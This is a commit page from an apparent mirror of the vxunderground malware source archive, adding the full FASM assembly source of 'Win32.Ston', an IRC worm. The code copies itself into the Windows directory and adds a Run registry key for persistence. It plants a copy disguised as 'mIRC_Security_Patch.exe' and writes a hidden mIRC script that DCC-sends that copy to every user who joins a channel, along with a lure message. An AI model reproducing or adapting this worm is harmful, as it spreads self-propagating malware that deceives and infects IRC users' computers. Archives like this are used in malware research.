mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-16 15:59:24 +00:00
Updated dir structure in Win32
This commit is contained in:
TheDuchy
@@ -0,0 +1,246 @@
|
||||
;--------------------------------------------------------------------+
|
||||
;name: Win32.Ston |
|
||||
;author: Hutley / RRLF |
|
||||
;date 30.Jun.2006 |
|
||||
;webpage: www.Hutley.de.vu |
|
||||
;--------------------------------------------------------------------+
|
||||
; *** FEATURES |
|
||||
; - Start with Windows by Registry |
|
||||
; - Spread by mIRC using a script file |
|
||||
; |
|
||||
; *** THANX |
|
||||
; - DiA, SPTH, blueowl, dr3f |
|
||||
; |
|
||||
; *** COMMENT! |
|
||||
; My first that spread by mIRC! |
|
||||
;--------------------------------------------------------------------+
|
||||
|
||||
include '%fasminc%\win32ax.inc'
|
||||
|
||||
.data
|
||||
about db "Win32.Ston by Hutley / RRLF", 0
|
||||
_windir rb 255d
|
||||
ston_file rb 255d
|
||||
ston_new rb 255d
|
||||
; registry variables
|
||||
reg_subkey equ "Software\Microsoft\Windows\CurrentVersion\Run", 0
|
||||
reg_result db ?
|
||||
reg_value equ "Ston", 0
|
||||
; infect mIRC
|
||||
mirc_reg equ "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC", 0
|
||||
mirc_reg_rst db ?
|
||||
mirc_path rb 255d
|
||||
mirc_size db 255d
|
||||
mirc_file equ "\mIRC_Security_Patch.exe", 0
|
||||
mirc_ston equ "ston.mrc", 0
|
||||
mirc_ston_hdl dd ?
|
||||
mirc_dccsend db ".dcc send -clm $nick ",0
|
||||
mirc_content db "; Win32.Ston.Script by Hutley/RRLF",13,10,\
|
||||
"",13,10,\
|
||||
"on 1:JOIN:#:if ($nick != $me) }",13,10
|
||||
mirc_ctnt_size = $ - mirc_content
|
||||
mirc_other db 256 dup(?)
|
||||
mirc_rest db 13,10,".privmsg $nick Accept, its a very nice one!",13,10,"}"
|
||||
mirc_writen dd 0
|
||||
;mirc.ini
|
||||
ini_file db 0
|
||||
|
||||
.code
|
||||
|
||||
start:
|
||||
call autostart ; ok! auto start with windows
|
||||
call infect_mirc ; ok! copy in mirc folder
|
||||
call write_mirc.ini ; write in mirc.ini
|
||||
|
||||
invoke ExitProcess,\ ; that's all folks!
|
||||
0
|
||||
.end start
|
||||
|
||||
proc write_mirc.ini
|
||||
invoke lstrcat,\
|
||||
ini_file,\
|
||||
"\mirc.ini"
|
||||
|
||||
invoke WritePrivateProfileString,\
|
||||
"rfiles",\
|
||||
"n2",\
|
||||
"ston.mrc",\
|
||||
ini_file
|
||||
ret
|
||||
endp
|
||||
|
||||
proc infect_mirc
|
||||
invoke RegOpenKeyEx,\
|
||||
HKEY_LOCAL_MACHINE,\
|
||||
mirc_reg,\
|
||||
0,\
|
||||
KEY_READ,\
|
||||
mirc_reg_rst
|
||||
|
||||
cmp eax, 0 ; any error?
|
||||
jne error ; then exit
|
||||
; whithout error, then continue
|
||||
invoke RegQueryValueEx,\
|
||||
dword[mirc_reg_rst],\
|
||||
"UninstallString",\
|
||||
0,\
|
||||
0,\
|
||||
mirc_path,\
|
||||
mirc_size
|
||||
|
||||
invoke lstrlen,\
|
||||
mirc_path
|
||||
|
||||
mov esi, mirc_path
|
||||
sub eax, 21 ; 12 to mirc.exe | 21 to C:\mirc\
|
||||
mov byte [esi + eax], 0
|
||||
inc esi
|
||||
|
||||
invoke RegCloseKey,\
|
||||
mirc_reg_rst
|
||||
|
||||
invoke GetModuleFileName,\
|
||||
0,\
|
||||
ston_file,\
|
||||
255d
|
||||
|
||||
invoke lstrcpy,\
|
||||
ston_new,\
|
||||
esi
|
||||
|
||||
invoke lstrcpy,\
|
||||
ini_file,\
|
||||
esi
|
||||
|
||||
invoke lstrcat,\
|
||||
ston_new,\
|
||||
mirc_file
|
||||
|
||||
invoke lstrcpy,\
|
||||
mirc_other,\
|
||||
".dcc send -clm $nick "
|
||||
|
||||
invoke lstrcat,\
|
||||
mirc_other,\
|
||||
esi
|
||||
|
||||
invoke lstrcat,\
|
||||
mirc_other,\
|
||||
mirc_file
|
||||
|
||||
invoke CopyFile,\ ; let´s copy in mIRC folder
|
||||
ston_file,\
|
||||
ston_new,\
|
||||
FALSE
|
||||
|
||||
invoke lstrlen,\
|
||||
ston_new
|
||||
|
||||
mov esi, ston_new
|
||||
sub eax, 23
|
||||
mov byte[esi + eax], 0
|
||||
|
||||
invoke lstrcat,\
|
||||
esi,\
|
||||
mirc_ston
|
||||
|
||||
invoke CreateFile,\ ; create the script file (ston.mrc)
|
||||
esi,\
|
||||
GENERIC_WRITE,\
|
||||
0,\
|
||||
0,\
|
||||
CREATE_ALWAYS,\
|
||||
FILE_ATTRIBUTE_HIDDEN,\
|
||||
0
|
||||
|
||||
cmp eax, INVALID_HANDLE_VALUE ; protection of erros
|
||||
je error ; error? get out!
|
||||
mov dword[mirc_ston_hdl], eax ; handle of file creation in variable
|
||||
|
||||
invoke WriteFile,\
|
||||
dword[mirc_ston_hdl],\
|
||||
mirc_content,\
|
||||
mirc_ctnt_size,\
|
||||
mirc_writen,\
|
||||
0
|
||||
|
||||
invoke lstrlen,\
|
||||
mirc_other
|
||||
|
||||
invoke WriteFile,\
|
||||
dword[mirc_ston_hdl],\
|
||||
mirc_other,\
|
||||
eax,\
|
||||
mirc_writen,\
|
||||
0
|
||||
|
||||
invoke lstrlen,\
|
||||
mirc_rest
|
||||
|
||||
invoke WriteFile,\
|
||||
dword[mirc_ston_hdl],\
|
||||
mirc_rest,\
|
||||
eax,\
|
||||
mirc_writen,\
|
||||
0
|
||||
|
||||
invoke CloseHandle,\
|
||||
dword[mirc_ston_hdl]
|
||||
|
||||
error: ; if exist error i go to here
|
||||
invoke RegCloseKey,\ ; close the opened key
|
||||
mirc_reg_rst
|
||||
ret
|
||||
endp
|
||||
|
||||
|
||||
proc autostart ; auto start the virus by win registry
|
||||
invoke GetWindowsDirectory,\ ; let's copy to windows dir
|
||||
_windir,\
|
||||
255d
|
||||
|
||||
invoke GetModuleFileName,\
|
||||
0,\
|
||||
ston_file,\
|
||||
255d
|
||||
|
||||
invoke lstrcpy,\
|
||||
ston_new,\
|
||||
_windir
|
||||
|
||||
invoke lstrcat,\
|
||||
ston_new,\
|
||||
"\WinStone.exe"
|
||||
|
||||
invoke CopyFile,\
|
||||
ston_file,\
|
||||
ston_new,\
|
||||
FALSE
|
||||
|
||||
invoke lstrcpy,\
|
||||
ston_file,\
|
||||
ston_new
|
||||
|
||||
invoke RegOpenKeyEx,\ ; add to registry
|
||||
HKEY_LOCAL_MACHINE,\
|
||||
reg_subkey,\
|
||||
0,\
|
||||
KEY_SET_VALUE,\
|
||||
reg_result
|
||||
|
||||
invoke lstrlen,\
|
||||
ston_file
|
||||
|
||||
invoke RegSetValueEx,\
|
||||
dword[reg_result],\
|
||||
reg_value,\
|
||||
0,\
|
||||
REG_SZ,\
|
||||
ston_file,\
|
||||
eax
|
||||
|
||||
invoke RegCloseKey,\
|
||||
dword[reg_result]
|
||||
ret
|
||||
endp
|
||||
|
||||
Reference in New Issue
Block a user